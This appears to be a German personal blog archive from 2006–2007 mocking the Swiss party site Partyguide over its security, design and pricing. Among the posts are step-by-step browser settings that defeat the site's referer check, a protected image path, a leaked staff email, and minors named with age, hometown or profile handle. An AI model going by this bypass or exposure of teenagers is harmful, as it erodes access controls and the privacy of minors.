Wissenswertes
Die häufigsten Familiennamen der Schweizer Jugend resp. der Partyguide-Benutzer? Seht selbst:
| 1. | Müller |
| 2. | Meier |
| 3. | Schmid |
| 4. | Gerber |
| 5. | Keller |
| 6. | Schneider |
| 7. | Weber |
| 8. | Moser |
| 9. | Meyer |
| 10. | Berger |
Und hier dasselbe mit den Vornamen:
| 1. | Michael |
| 2. | Daniel |
| 3. | Thomas |
| 4. | Marco |
| 5. | Stefan |
| 6. | Patrick |
| 7. | Sandra |
| 8. | Marc |
| 9. | Simon |
| 10. | Pascal |
Es scheint symptomatisch für Partyguide zu sein, dass unter den zehn häufigsten Vornamen nur gerade ein weiblicher Name auftaucht ...
Labels: Partyguide
Samstag, März 31, 2007
Partyguide erhält "sein" Watchblog
Sicherheitslücken sind das eine - unkonformer, redundanter und uralter HTML-Code sowie scheussliches Design sind die anderen Schwachstellen der längst renovationsbedürftigen "meist besuchtesten" Party-Site im deutschschweizerischen Raum. Danke an Ale, der/die ein Blog geschaffen hat, dass sich ausschliesslich den ästhetischen Vorzügen von Partyguide angenommen hat:
Irgendwie befürchte ich, dass dem Blog der Stoff nicht so schnell ausgehen wird ...
Labels: Blogosphäre, Partyguide
Sonntag, März 18, 2007
Job bei Partyguide?
[...]
Turns out he’s now head of security at Facebook.
How did he get the job? He hacked into Facebook’s site. They hired him to fix the problems. Very unconventional. But smart. Lucky that Chris didn’t get arrested (he knows of other people who did the same thing to other companies who weren’t as lucky, so he doesn’t recommend it as a career path).
Quelle: Story behind Facebook’s new security guy
Einige Leute haben mich gefragt, wieso ich nicht Partyguide anheuern möchte, zumal momentan gerade ein entsprechender Job ausgeschrieben ist. Nun - einerseits wäre es natürlich eine sehr reizvolle Aufgabe. Doch ich befürchte, dass meine Mentalität mit dem restlichen Team (insbesondere mit dem Käptn der Argo) nicht wirklich vereinbar ist. Ausserdem würde ich - wenn überhaupt - nur unter der Bedingung anheuern, wenn die Site komplett einem Redesign - und noch wichtiger - einem kompletten Recode unterworfen würde. Ein solches Vorhaben würde wohl gut und gern tausende Mannsstunden beanspruchen.
Ne ne du, ich bleibe bei meinen jetzigen Jobs, bin aber gespannt, wer sich den "messy source code" schlussendlich antun wird ... Vielleicht eröffnet der Entwickler dann auch gleich das heiss ersehnte Tech-Blog? Wer weiss!
Labels: Job, Partyguide
Donnerstag, März 01, 2007
Fleischmärkte Partyguide & Co.
Im heute erschienen FACTS befasst sich die Journalistin Ruth Brüderlin mit den Schattenseiten von Party-Sites. Wer als sensibilisierter Leser dieses Blogs dabei aber primär an Datenlecks denkt, ist auf der falschen Fährte: Es geht viel eher um beleidigende und rassistische Kommentare, die die Leute in solchen Communities auf die digitale Pinwand pinnen. Und um Minderjährige, die sich in anzüglichen Posen zur Schau stellen.
Heisser Sommer
Und ja, liebe Argonauten, das musste ja so kommen: Natürlich habe ich eure Hommage an meinereiner sofort bemerkt. Merci! Schön, dass Sicherheit nun auch für euch kein Fremdwort mehr zu sein scheint ... Leider gibt es noch ein ungestopftes Datenleck, doch dazu in Bälde mehr ...
Labels: Gesellschaft, Partyguide, Web
Freitag, Februar 09, 2007
Der StudiVZ-Virus geht um
StudiVZ kannt ich bisher nur vom Hörensagen und reihte es in dieselbe Kategorie wie das us-amerikanische Pendant Facebook ein: In dieser Web-Community tummeln sich vornehmlich StudentInnen aus dem deutschsprachigen Raum und üben schon einmal, wie es dann im Berufsleben in den Businesscommunities LinkedIn (eher in Nordamerika verbreitet) und Xing (ehemals OpenBC; eher in Europa stark) zu und hergehen könnte ... Irgendwie fühle ich mich dort immer noch fehl am Platz, bin ich - trotz Teilzeitjob im IT-Bereich - immer noch mehr Student, als Business-Leuten lieb sein kann.
Plötzlicher Boom
Vor einigen Tagen habe ich nun - trotz Sicherheitsbedenken - beschlossen, mich ebenfalls auf dieser Community zu präsentieren. Und ich bin nicht der einzige - momentan breitet sich die Kunde von dieser Site virusartig in Bern und Fribourg herum aus. Mund-zu-Mund-Propaganda, ohne dass die Macher teures Geld in nutzlose Marketing-Kampagnen gesteckt hätten.
Wenige Tage vor mir (27. Januar) schrieb sich Stibä dort ein, heute nun das flexe Lenz & Stähelin-Fäbi. Der Tom war erstaunlicherweise schon lange vor mir Mitglied (Dezember 2006), ebenso "dr Giu, wo mau e Igelifrisur het gha" (24. Januar).
Nette Features
- Weiss jemand, was "gruscheln" bedeutet?
- Eine Liste derjenigen Benutzer, die mein Profil kürzlich betrachtet haben (Partyguide will Geld dafür, hier ist es gratis)
- Gruppen - Auf den ersten Blick nutzlos, doch dienen sie dazu, das eigene "Image" zurechtzuzimmern. So bin ich etwa Mitglied in einer Mac-Gruppe, einer LaTeX-Gruppe (LaTeX, nicht Latex!!!), Linux, Egger Bier, Bern-rulez, Weintrinker ... und Prison Break.
Fazit
Student? Schreib dich ein unter StudiVZ.net.
Labels: Partyguide
Montag, Februar 05, 2007
Partyguide-Membership revisited
Dank eines anonymen Tippgebers konnte ich meine Behauptung, dass Staffmitglieder von Partyguide zu einem kostenpflichtigen Member-Abo genötigt werden, verifizieren. Leider hatte ich nicht recht - die Member-Abos werden je nach Hierarchie gratis verteilt, wie folgendem Mail zu entnehmen ist:
From: staff@partyguide.ch <staff@partyguide.ch>
Date: 31.01.2007 20:01
Subject: Member-Projekt Phase 2 - JETZT online!
To: staff@lists.partyguide.chHallo liebe STAFFs
Die Phase 2 der Neuentwicklung ist online!
Ab sofort sind die neuen Member-Abos verfügbar, welche Dir weitere Funktionen und Priviliegien auf PartyGuide.ch ermöglichen. Der bisherige Benutzeraccount heisst ab sofort Free-Member und hat die gleichen Funktionen wie bis anhin.
Neu gibt es zusätzlich Basic- und Premium Abos. Die Vorteile dieser Abos findest Du auf folgender Seite:
Damit ihr STAFFs nun auch GRATIS in den Genuss der neuen Funktionen von Basic- oder Premium Mitgliedschaften kommen könnt, haben wir uns für euch zu folgender Vergabe von GRATIS Mitgliedschaften entschlossen.
- Junior STAFF = Bleibt weiterhin Free Member
- STAFF = Wird gratis Basic Member so lange er die Funktion als STAFF hat
- Senior STAFF = Wird gratis Premium Member so lange er diese Funktion als Senior STAFF hat
Für alle STAFF's welche im Bereich Community, Content, Administration und Redaktion tätig sind, werden diese Mitgliedschaften individuell vom jeweiligen Leiter des Bereichs Verteilt. So werden z.b für Contents im Bereich Eventkalender ab 400 Einträgen im Jahr eine Basic Member Funktion erhalten.
Falls ihr noch Fragen habt, beantworte ich euch diese gerne.
Gruss Mark
PartyGuide.ch GmbH
Leitung HR
Folglich muss man von den Basic- und Premium-Members Staff-Mitarbeiter abziehen, um eine ungefähre Ahnung davon zu erhalten, wieviele Leute bereit sind, für Partyguide zu bezahlen ...
Labels: Partyguide
Samstag, Februar 03, 2007
(Partyguide) Referer-Check austricksen
Wer von Links auf externen Seiten, wie bspw. meinem Blog, auf ein Profil eines Partyguide-Users weitergeleitet wird, kriegt nichts zu sehen. Schuld daran ist ein Referer-Check, der nur Anfragen erlaubt, die von Links auf einer Seite der Domain partyguide.ch gemacht werden.
Wer Firefox einsetzt, kann sich nun helfen: Mit RefControl kann man individuell einstellen, bei welchen Sites Referer gesendet, und bei welchen Sites diese zuweilen geschwätzige Funktion die "Schnauze" halten soll.
Lustigerweise werden bei Safari keine Referer gesendet, wenn man einen Link in einem neuen Tab öffnet (jedenfalls verweigert Partyguide den Dienst nicht).
Installation
- Die Firefox-Extension herunterladen und installieren
- Firefox neu starten
- Tools > RefControl Options ...
- Add Site
- partyguide.ch
- Block - send no referer
- OK
- OK
Test
Notabene
Man muss als User selbstverständlich weiterhin eingeloggt sein, sprich ein Partyguide-Cookie auf seiner Platte liegen haben ...
Labels: Partyguide
Freitag, Februar 02, 2007
Danke, Jason!
Partyguide fackelte nicht lange, als ich gestern androhte ....
Sollte ich in den nächsten Wochen Zeit haben, werde ich mir einen kleinen Crawler basteln, der alle Profile nach dem Premium-Logo abgrast. So lässt sich relativ einfach feststellen, ob und wie viele Leute bereit sind, für Partyguide Geld auszugeben.
Quelle: Kriegen Partyguide Premium-Member ...
Die Mühe kann ich mir nun sparen (puuuh!), denn Partyguide selbst zeigt nun alle Basic- und Premium-Members an:
Übersicht der Basic- und Premium Members
Respekt!
Zum ersten Mal verspüre ich ein bisschen Respekt vor den Machern: Offenheit. Das Erfolgsrezept im 21. Jahrhunderts. Motto: "PG hat nichts zu verbergen!" Langsam habt auch ihr es begriffen. Der Weg zum eigenen (Tech-)Blog scheint nun auch für euch nicht mehr weit. Weiter so!
Genial!
Als Nebeneffekt könnte nun durchaus eine positive Rückkoppelung einsetzen: "Was, mein Kollege bezahlt 65 Stutz im Jahr, um Member zu sein? Ich will auch!". Not Bad! Deshalb: Marketing-Fuzzi, du hast deinen diesmonatigen Lohn wirklich verdient! (Und das meine ich jetzt Ernst!)
Einzige Befürchtung: Die Seite wurde so schnell zusammengezimmert, dass noch einige sicherheitskritische Bugs im entsprechenden Script herumlungern ...
Übrigens: Ob Staff-Mitglieder zu einem Zwangsabonnement gezwungen wurden, entzieht sich meiner Kenntnis.
Labels: Partyguide
Mittwoch, Januar 31, 2007
Kriegen Partyguide Premium-Member ...
... dann auch Premium-Sicherheitslöcher? ;-)
Partyguide bietet ab sofort auch kostenpflichtige Mitgliedschaften an - die Namensgebung scheint an Windows Vista angelehnt zu sein (haben die beiden Unternehmen etwa denselben Marketing-Fuzzi engagiert?):
- Free - 0 SFr. / Jahr
- Basic - 60 SFr. / Jahr
- Premium - 75 SFr. / Jahr
Quelle: Member-Abos
Prognose
think eMeidi findet: Die Angebote sind deutlich überteuert. Für meinen Flickr-Account bezahle ich 25USD im Jahr und erhalte dafür 2GB Upload pro Monat, Zugang zu einer riesigen Community und - last but not least - eine performante, sichere Infrastruktur (letzteres kann Partyguide definitiv nicht vorweisen).
Ob die mehrheitlich jugendliche Kundschaft von Partyguide bereit sein wird, 60 oder gar 75 SFr. pro Jahr auszugeben, ist aus meiner Sicht höchst zweifelhaft. Aber ein Versuch ist es wert.
Statistik
Sollte ich in den nächsten Wochen Zeit haben, werde ich mir einen kleinen Crawler basteln, der alle Profile nach dem Premium-Logo abgrast. So lässt sich relativ einfach feststellen, ob und wie viele Leute bereit sind, für Partyguide Geld auszugeben.
Einziges Killerfeature
Anzeige der letzten 50 User, welche Dein Profil angeschaut haben.
Und vielleicht noch ...
Original Party Pictures können heruntergeladen werden.
... wobei es eine gute Idee war, die Downloads pro Monat auf 10 resp. 30 Bilder zu limitieren.
Zugriff auf die Bilder gibt es übrigens bereits heute - aber nur gegen Usernamen und Passwort:
www.partyguide.ch/partypictures_originale/
Beispielsweise:
/2006/22807/00029683_00000166.jpg
Natürlich kenne ich die Zugangsdaten nicht.
Verwendungszweck
Solange sich Jason mit dem Erlös kein neues Cabrio, sondern einen fähigen PHP-Developer (in Personalunion mit einem Sicherheitsexperten) leistet, habe ich nichts gegen die kommerzielle Ausschlachtung der "Fanbase".
Ach, und ein Redesign wäre schon längst fällig: Wer sich im Jahre 2007 immer noch auf Pop-Ups und Frames verlässt, um essentielle Bestandteile einer Web-Site anzuzeigen, dem ist kaum mehr zu helfen ...
Dank: "Ace Ventura"
Labels: Partyguide, Windows
Montag, Januar 08, 2007
Lautundspitz bloggt! Wo bleibt Partyguide?
Nachdem Silvan und seine Crew gezeigt haben, wie man Corporate-Blogging korrekt einsetzt, zieht nun auch Lautundspitz nach - bravo, Herr Saxer!
Schade nur, dass der Volltext der Artikel nur nach dem Login mit einem gültigen Benutzeraccount gelesen werden kann ...
Ich freue mich auf ähnlich spannende Berichte wie im Tilllate Tech-Blog - so etwas schafft Vertrauen! Besonders interessieren mich immer wieder die Artikel über Performance-Optimierungen - sehr lehrreich!
Wer fehlt denn jetzt noch? Ach ja, genau: Das "Partyguide Techblog". Wird wohl nie kommen - Vorwand: Zu viele unzensierte Informationen für potentielle Hacker. Wahrer Grund: "Mann, überlegen die von Tilllate und Lautundspitz gründlichl, wenn sie PHP-Scripts zusammenprogrammieren ... Ob die wohl wissen, wie man ohne register_globals arbeitet?"
Labels: Partyguide
Montag, Januar 08, 2007
Die dunkle Seite der Party-Photographie
Partyguide hat es wieder einmal in die Qualitäts-Zeitschrift 20 Minuten geschafft - die Nachricht wird dem "Marketingverantwortlichen" wohl aber schlaflose Nächte bereiten (schreibt ihr dem Arbeitgeber des fehlbaren Photographen auch so einen schicken Brief, gezeichnet mit "hochachtungsvoll"?) ...
Partyfotograf (25) lichtete 14-Jährige für Erotiksites ab
Auf seinen Fototouren durchs Nachtleben suchte ein Ostschweizer Partyfotograf nach ganz jungen Mädchen für Erotikbilder. [...]
Quelle: Partyfotograf (25) lichtete 14-Jährige für Erotiksites ab
Dank: Simon & Matthias (S. schlägt M. um 3 Minuten - gut gemacht, Jungs, weiter so *smile*) ... Nachtrag: Dank auch an Bruder Sandro sowie Kollege Christian (auch hier ein Kopf-An-Kopf-Rennen - etwa 3 Minuten trennen die beiden Kontrahenten) ... Nachtrag: Nun ist wohl auch Kollege Zgraggen auf dem Heimweg und liest Gratis-Zeitungen *smile*
Wer nun aber ein Partyguide-Bashing erwartet hat, ist hier fehl am Platz. Nicht etwa, weil ich mittlerweile Angst vor Jason und seinen Argonauten und ihren Strafanzeigen bekommen habe, sondern weil so etwas genau so gut auch bei Tilllate, Lautundspitz, Usgang, Liidahun (oder wie sie alle heissen) passieren kann (okey, die letzte Erwähnung war ein Joke).
Ich befürchte, dass die "Arbeitgeber" (in Cash bezahlt werden die Photographen in der Regel ja nicht) hier kaum etwas unternehmen können: Das Privatleben von Photographen zu kontrollieren wäre äusserst fragwürdig und personell kaum machbar. Einzig könnte man sich überlegen, Photographen immer nur mindestens zu zweit ausrücken zu lassen, damit eine gewisse Kontrolle besteht. Oder ein ganz ausgefallener Vorschlag: Lasst nur noch weibliche Photographinnen ran ;-)
Doch auch das verhindert nicht, dass ein Photograph mit umgehängten Badge nicht nur Photos schiesst, sondern auch mit dem anderen Geschlecht flirtet. Grundsätzlich ist so etwas ja auch nicht verwerflich - ausser die Person ist minderjährig (Zwischenfrage: Was hat diese dann aber überhaupt an einer Party zu suchen? Das müsste der Veranstalter erklären. Wäre dies geschehen, kämen als nächstes die Eltern in den Zeugenstand. Denn auch diese sollten eine gewisse Verantwortung für ihre Schützlinge übernehmen)
Der Fehler
[...] Aufgrund einer sexuellen Beziehung, die er mit einem damals 15-jährigen Model hatte, wurde der Mann am Donnerstag verhaftet.
Jetzt wird's eng für den Casanova - Art. 183 StGB scheint ihm unbekannt zu sein. Falls man den Typen wegen den Bildli nicht verurteilen kann, so kommt er spätestens hier in Erklärungsnot.
Man darf sich aber keine Illusionen machen - als Photograph im Nachtleben steht man rasch im Mittelpunkt und findet Zugang zum anderen Geschlecht. Ich glaube nicht, dass er der erste und letzte Photograph war, der nach einer durchzechten Nacht die Kamera bei Seite legte (komisch, dass er das nicht auch gleich "verwertet" hat ...) und noch eine Weile nicht "einschlafen" konnte.
Schwarz und Weiss?
Einige werden von Photographen mit zwielichtigen Beweggründen ausgenutzt und verführt, andere lichten sich freiwillig in solchen Posen ab und stellen sich ins Internet. Ein kurzer Partyguide-Streifzug bringt in Sekundenschnelle nicht weniger fragwürdige Bilder zu Tage (zugänglich für alle registrierten Partyguide-Benutzer):
Quelle: caermlaeee (Jg. 1990)
Um die monatlichen Miss-Wahlen zu gewinnen legen sich einige Minderjährige mächtig ins Zeug! Wenn das deren Eltern wüssten? Beileibe kein Einzelfall - aus meiner Sicht ebenso fragwürdig wie "Model-Shootings" mit Minderjährigen.
Ich frage mich zuweilen, wo denn die Grenze zu ziehen ist - wie stark unterscheidet sich z.B. Musikstar (Unterton: "Ich mache dich berühmt, beliebt und reich!") von bösen Model-Photographen? Beide nutzen Jugendliche auf voyeuristische Art aus, um Profit zu generieren, ohne dass sich die Opfer über alle möglichen Folgen ihrer Taten wirklich im Klaren sind.
Nachtrag
Labels: Partyguide
Montag, November 27, 2006
Partyguide kriegt einen grossen Klon: StudiVZ
Die Neuigkeiten bezüglich dem Studentenverzeichnis haben es ja mittlerweile über heise online bis auf SPIEGEL online geschafft. Nach einem Hinweis von Kollege Liechti (Danke!) habe ich mir die Sache etwas genauer angeschaut.
Die Entdeckungen sind ... nun ja ... nicht gerade fabrikneu. Das gab's bereits auf anderen Sites - wer mit meinen Partyguide-"Hacks" vertraut ist, dem kommt folgendes Statement irgendwie bekannt vor:
Das eigentliche Problem ist aber, dass über die „Supersuche“ auch private Daten in geschützten Profilen abgefragt und als Ergebnis angezeigt werden. Ja, werden sie.
Auch die Suche führt offenbar ein Eigenleben und findet Mitglieder auch anhand von Merkmalen, die eigentlich verborgen sind, wie Schäfers in seinem Blog darlegt.
Quelle: StudiVZ: Sicherheitsbedenken sind mehr als begründet
Bei Partyguide war die "Supersuche" derart gut, dass ein spitzfindiger Formular-Hijacker Personen gar gemäss einem ausgewählten Passwort suchen lassen konnte. Natürlich stand nebenbei auch der richtige Namen, Vornamen oder das Geburtsdatum als Suchattribut zur Verfügung.
Der Blogger, der die StudiVZ-Schwachstellen aufgedeckt hat (ob er wohl schon eine Strafanzeige am Hals hat? *grins*), versucht im Anschluss, die Unternehmenskultur dieses Web2.0-Unternehmens zu charakterisieren:
Ich glaube, dass die Probleme im technischen (Bugs, Privacy Issues) und im organisatorischen (Mitarbeiter in Stalking-Gruppen, Nazi-Einladungen, Praktikanten auf Luftmatrazen etc) Bereich ihre Wurzeln tief in der Unternehmenskultur haben. Die schlanken Strukturen und das “einfach mal machen”, die man beim StudiVZ als kreatives Chaos zu kultivieren versucht, führen scheinbar zu Problemen, die bei einem klassischen Projektmanagement so wohl nicht auftreten würden.
Das kann man nicht einfach nachbessern, das ist ein strukturelles Problem und permanentes Pulverfass.
Quelle: StudiVZ: Sicherheitsbedenken sind mehr als begründet
Lustig - StudiVZ und Partyguide scheinen dieselben Unternehmenskultur aufzuweisen: Separated at birth? Oder macht Jason gerade ein Internship in Deutschland? Für sachdienliche Hinweise nehmen meine Leser bitte Kontakt mit mir auf.
Laszive Bilder?
Bezüglich der "schlimmen" Bilder von Fräuleins, die SPIEGEL mehr zu kümmern scheinen als die allzu auskunftsfreudige Suchfunktion, mache ich mir keine Sorgen - wer sich halbnackt und in erotischen Posen ins Netz lädt, muss halt einfach damit rechnen, dass die Bilder plötzlich nicht nur der engere Kollegenkreis zu sehen bekommt ...
Labels: Partyguide
Samstag, Oktober 28, 2006
Jungbürgerfeier Neuenegg 2006
Gestern durfte ich an der diesjährigen Jungbürgerfeier der Gemeinde Neuenegg im Restaurant zum Zimmermann auf der Süri teilnehmen und als Festredner eine Ansprache halten. Allfällig Interessierten möchte ich meine Worte nicht vorenthalten:
Die Rede scheint den Anwesenden gefallen zu haben - vor allem der Passus "... ein Hort der Friedlichkeit und der Nächstenliebe" sorgte für Erheiterung.
Auf Platz waren neben dem (fast) vollständigen Gemeinderat 21 JungbürgerInnen (50% der Angeschriebenen), die mehrheitlich von ihren Eltern begleitet wurden. Nach der Rede gab es ein vorzügliches Fondue zu geniessen, während dem man sich über politische wie auch apolitische Themen unterhalten konnte.
Es hat mich gefreut, an diesem Anlass teilgenommen zu haben und hoffe, dass die Anwesenden freude an meiner Rede hatten.
PS: Die Kunde über meinen Partyguide-Hack scheint auch die Dorfjugend erreicht zu haben - ich wurde jedenfalls (wie erwartet/befürchtet) darauf angesprochen. Die allgemeine Meinung zum Thema war positiv, auch wenn ich den jungen Burschten davon abgeraten habe, es mir gleich zu tun - die Querelen mit der Justiz sind es nicht wert.
Labels: Neuenegg, Partyguide
Dienstag, Oktober 17, 2006
Tilllate bloggt! Wo bleibt Partyguide?
Danke an Goldengel Martina, die mich soeben darauf aufmerksam gemacht hat, dass Tilllate bloggt:
Schlechte Vorahnung ...
Meine Befürchtung: Um Himmels willen, ein weiteres PR-Blog hat die Blogosphäre nicht wirklich gebraucht!
... und Entwarnung
Beim Techblog handelt es sich aber - wie es der Titel bereits vermuten lässt - nicht um die Verbreitung von Parolen aus der Marketing-Abteilung, sondern um handfeste Weisheiten aus der Geek-Abteilung bei Tilllate.
CTO- und gelegentlicher Verfasser des tilllate-Newsletters Silvan bringt es auf den Punkt:
tilllate.com ist aber auch Technologie: 31 Server. 430 Datenbanktabellen. 60′000 Zeilen Code. PHP, MySQL, JSON, XSL. Und ein Team von 5 Entwicklern und Ingenieure, welche die Applikation und Infrastruktur warten und weiterentwickeln. Um bei den Clubbern Nummer 1 zu sein ist nämlich nicht nur Aktualität und höchste Fotoqualität notwendig. Sondern auch innovative Features eine schnelle Website.
Quelle: techblog.tilllate.com?
Aus meiner Sicht ein höchst interessantes Gebiet, auf dem sich Tilllate da technisch bewegt, weshalb ich gespannt alles Tech-Futter fressen werde, das mir vorgeworfen wird. Schliesslich weisen die Web-Sites in meinem Portfolio tägliche Nutzerzahlen auf, die Tilllate & Co. an Sonntagen wohl in wenigen Minuten erreicht. Und diesem Ansturm muss man gewachsen sein - Partyguide beispielsweise hatte lange Probleme, dem Besucheransturm Schritt zu halten. Resultat: 75 Sekunden, bis die Startseite an überloffenen Sonntagen fertig geladen war.
Habt ihr den gar nichts zu verstecken?
Wenige Wochen nach meinem Artikel löste sich der Knoten anscheinend - wie und warum weiss niemand. Genau diese Informationslücke könnte ein Tech-Blog der Entwickler schliessen. Natürlich muss man dennoch bei jedem Artikel abwägen, was man preisgeben möchte (Der Konkurrenz zeigen wie's geht? Aber auch besteht die die latente Gefahr, dass zu viele Infos von Hackern ausgenutzt werden könnten).
Andererseits öffnet man sich gegenüber der Community, die sich nun direkt mit Kommentaren - wiederum öffentlich - äussern. Die Entwickler könnten so neue, geplante Features präsentieren und (ausgewählte?) Tester zu ihrer Meinung befragen. Es besteht die Möglichkeit, Screenshots und erste Sneak-Peeks im Blog zu präsentieren und der Leserschaft aufzuzeigen, dass man stetig daran arbeitet, das Produkt schneller, besser und sicherer zu machen.
Auf dieser Gratwanderung (wo ist mehr Offenheit gut, wo eher schädlich?) wünsche ich Silvan und seinen Komparsen viel Erfolg!
Nebenbei: Ob Tilllate-Intern schon Wetten laufen, wann die ersten Kommentar-Spam-Wellen des Partyguide-Kindergartens auf ihr Blog überschwappen? *smile*
Sorry ...
... aber der Seitenhieb musste ja noch kommen: Wann kommt eigentlich techblog.partyguide.ch? Zumindest ich würde mich brennend für ein Outing des/der PHP-Frickler und Sicherheitsexperten des "meistbesuchten Freizeitportal der Schweiz" interessieren ...
Labels: Partyguide
Montag, Oktober 16, 2006
Hilfe, ich bin erwachsen!
Stinkfrech kopiere ich gleich einen ganzen Blog-Artikel und gebe ihn hier wieder. Dem Gesagten muss nichts beigefügt werden:
- Your house plants are alive, and you can't smoke any of them.
- Having sex in a twin bed is out of the question.
- You keep more food than beer in the fridge.
- 6:00 AM is when you get up, not when you go to bed.
- You hear your favorite song on an elevator.
- You watch the Weather Channel.
- Your friends marry and divorce instead of hook up and break up.
- You go from 130 days of vacation time to 14.
- Jeans and a sweater no longer qualify as "dressed up."
- You're the one calling the police because those damn kids next door won't turn down the stereo.
- Older relatives feel comfortable telling sex jokes around you.
- You don't know what time Taco Bell closes anymore.
- Your car insurance goes down and your payments go up.
- You feed your dog Science Diet instead of McDonalds leftovers.
- Sleeping on the couch makes your back hurt.
- You no longer take naps from noon to 6 PM.
- Dinner and a movie is the whole date instead of the beginning of one.
- Eating a basket of chicken wings at 3 AM would severely upset, rather than settle your stomach.
- You go to the drug store for ibuprofen and antacid, not condoms and pregnancy tests.
- A $4.00 bottle of wine is no longer "pretty good stuff".
- You actually eat breakfast food at breakfast time.
- "I just can't drink the way I used to," replaces, "I'm never going to drink that much again."
- 90% of the time you spend in front of a computer is for real work.
- You drink at home to save money before going to a bar.
- You read this entire list looking desperately for one sign that doesn't apply to you and can't find one to save Your sorry old ass.
Quelle: 25 Signs That, Sadly, You've Grown Up
Weniger als ein Monat nach meinem 26. Geburtstag kam mir diese Liste ziemlich gelegen. Mit Schrecken habe ich zudem feststellen müssen, dass die von Partyguide abgelichteten Personen am Süri Oktoberfest 2006 mehrheitlich Jahrgang 1990 haben ... Scheisse! Jetzt gehe ich also schon an Parties, an denen die Leute gar schon 10 Jahre jünger sind als ich! Hülfeee!
Labels: Partyguide
Donnerstag, Oktober 12, 2006
Neueneggerin will Music-Star werden!
Bevor es grippe-bedingt zu christlichen Zeiten ins Bett geht, werden die Blog-Feeds gecheckt. Fredy erzählt uns über eine 10M-Ethernet-Installation und das iBGP (das BGP kenne ich nur dank einem kürzlich erschienen c't-Artikel, den ich aber nicht durchgelesen habe - für was auch, mit Fredy haben wir ja einen Fachmann für solche Dinge in der Blogosphäre).
Seiner Aufforderung, doch gefälligst das Blog von local.ch zu abonnieren, komme ich umgehend nach und entdecke denn auch gleich einen Artikel, der mein Zu-Bett-Gehen noch weiter hinauszögert:
Wer wird der nächste MusicStar?
Das wissen wir auch noch nicht. Jedoch wissen wir wer aus deiner Nachbarschaft mitmacht! [...]
Quelle: Wer wird der nächste MusicStar?
Neuenegg
Tatsächlich - sehr schön gemacht. Und natürlich zoome ich nach Neuenegg (Hint: Zwischen Bern und Fribourg):
Und es gibt jemand aus dem Dorf, und die werte Dame singt auch gar nicht mal schlecht: *froi*
Denise (17) aus Neuenegg (RealVideo)
Lokalprominenz. Hält sich desöfteren donnerstags im In-Schuppen Disco Outside auf ... und kennt Kollege Torquie! ("Giele, hautet eifach d'Frässe, i zahlenech es Wasser!"). Hat auch einen Partyguide-Account (wieder einmal als abschreckendes Beispiel, wie rasch Social Engineering mittels Informationsfetzen aus verschiedenen Web-Angeboten funktionieren kann). Alte Schwedin! *zwinker* Groupies haben also die Möglichkeit, Avancen via Partyguide zu lancieren ...
Überstorf
Schweift der Blick gen Süden, gleich um den Miststock herum, findet sich noch eine Kandidatin aus dem Niemandsland um Überstorf:
Sonja (16) aus Überstorf (RealVideo)
Schmitten
Etwas gegen Westen findet sich eine weitere wackere Kämpferin aus dem ehrwürdigen "Schmütten" resp. Schmitten (FR):
Stefanie (21) aus Schmitten
Giffers
Sogar in meinem Heimatort Giffers findet sich eine unerschrocken Sängerin:
Stephanie (17) aus Giffers (RealVideo)
Die Chancen stehen gut, dass sie den Geschlechtsnamen Aeby trägt ;-)
Frauenkiste
Schade, keine Männer (Tipp: Richtung Bern kommen sie dann hervor ...)
Viel Spass mit den Gesangsstücken, und vergesst nicht zu voten!
Vom Sinn der Datenaufbereitung
Dieses kleine Beispiel zeigt, wie eine riesige Datensammlung (Casting-Clips) derart aufbereitet werden kann, dass Benutzer die Informationen subjektiv filtern und in kleinen Häppchen konsumieren können. Ein wahrlich vorbildlicher Einsatz eines GIS-Systems. Da drauf muss man erst kommen!
Labels: Neuenegg, Partyguide
Freitag, Oktober 06, 2006
Hobbies einer 18-jährigen Bernerin
my hobbies:
- kolleginnä träffä,
- einä dräiä,
- uf dr schanze hängä,
- vödu lääre
- und ds weekend abchille!!!!
Quelle: !baby_phat!
Eh ja, wes nume das isch ... Habe ihr trotzdem/gerade deswegen ein Wow gegeben.
(Als Ergänzung zu Kollege Torquies Kritik an der heutigen Jugend ...)
Labels: Partyguide
Dienstag, Oktober 03, 2006
Pornoguide.ch - Partyguide reagiert schnell
Bravo Jason, das ging aber schnell:
HTTP/1.1 200 OK Date: Tue, 03 Oct 2006 12:19:02 GMT Server: Apache/1.3.33 (Unix) Last-Modified: Tue, 03 Oct 2006 05:51:16 GMT ETag: "503d6-573-4521fa54" Accept-Ranges: bytes Content-Length: 1395 Keep-Alive: timeout=6, max=20 Connection: Keep-Alive Content-Type: text/html
Seit heute Morgen begrüsst Surfer, die sich www.pornoguide.ch anschauen wollen, eine neue Meldung:
PornoGuide.ch
Was willst Du dir da bloss ansehen? ;)
Kein Porno aber schöne Party Pictures findest Du bei Partyguide
Ob das mit meinem Artikel Usgang.com von gestern Abend zusammenhängt? Ein Schelm, ...
Labels: Partyguide
Montag, Oktober 02, 2006
Usgang.com
Wenn Jason (Künstlername: Der Chronist der Nacht) und sein Pappi nicht gerade nette Briefe schreiben, binden sie sich die Totenkopfflagge um und kapern hemdsärmlig freistehende Domains:
www.usgang.com
Besitzer: Jason Fellmann (WHOIS)
Jasons treue Gefolgschaft feiert solche Eroberungen natürlich mit Korkenknallen (Rimuss Party, Alkohol darf man ja dort noch nicht trinken).
Wieder ein Grund mehr, sich mit den anderen, professionelleren Plattformen da draussen (Tilllate, Lautundspitz und Usgang) zu solidarisieren.
Wiederholungstäter
Nicht, dass der Kindergarten im Partyguide-Hauptquartier erst kürzlich eröffnet worden ist - als ein scheidender Partyguide-Fotograf seine eigene Partybilder-Site fire-pics.ch gründete, fackelte der anscheinend düpierte Jason F. nicht lange und reservierte sich zwei Wochen später www.firepics.ch.
(Unter uns: Denen hast du es aber so richtig gezeigt, Jason! *schulterklopf*)
In einem kurzen Augenblick der Vernunft besonn sich Jason dann wohl darauf, lieber Sicherheitslücken in sein eigenes Produkt einzubauen und vergass dabei prompt, die Domain-Rechnung zu begleichen. Heute gehört auch firepics.ch dem rechtmässigen Besitzer.
Partyguide ist nicht nur die angeblich meistbesuchte Web-Site der Schweiz, sondern verfügt auch über die hinterlistigsten Mitarbeiter. Bravo!
Porno ...?!
Lustig, man begebe sich auf www.pornoguide.ch und schaue, wo "einen das Schicksal hinführt" (Zitat anonyme Tippgeberin - Merci!).
Ich bin gespannt, wie lange diese Weiterleitung nach der Veröffentlichung meines Blog-Artikels aktiviert bleibt. Erstaunlicherweise handelt es sich aber kein Streich der Mitbewerber, sondern offensichtlich um Jasons Ernst:
(Falls die Umleitung in den nächste Stunden/Tagen deaktiviert werden sollte: Man surft pornoguide.ch an und landet auf partyguide.ch ... Halleluja!)
Mein Rat
